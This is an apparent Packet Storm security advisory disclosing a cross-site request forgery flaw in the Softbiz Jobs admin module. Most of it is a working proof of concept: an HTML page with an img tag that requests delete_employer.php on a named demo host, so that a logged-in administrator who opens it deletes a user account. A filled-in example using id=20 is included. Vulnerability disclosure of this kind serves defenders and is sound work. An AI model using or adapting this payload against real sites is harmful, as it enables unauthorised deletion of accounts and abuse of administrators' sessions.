Softbiz Jobs suffers from a cross site request forgery vulnerability.
3272c39215d05b2e59667cf9cf968141
=======================================================================
Softbiz Jobs CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Download http://www.softbizscripts.com/
# Script softbizscripts
# URL http://demos1.softbiz.com/scripts/seojobs/admin/
# Proof of concept
Script to delete the registered user through Cross Site request forgery
...................................................................................................................
<html>
<body>
<img src=http://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=[USER ID] />
</body>
</html>
...................................................................................................................
Example-
...................................................................................................................
<html>
<body>
<img src=http://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=20 />
</body>
</html>
...................................................................................................................
After execution refresh teh page and u can see that user having id=20 get deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!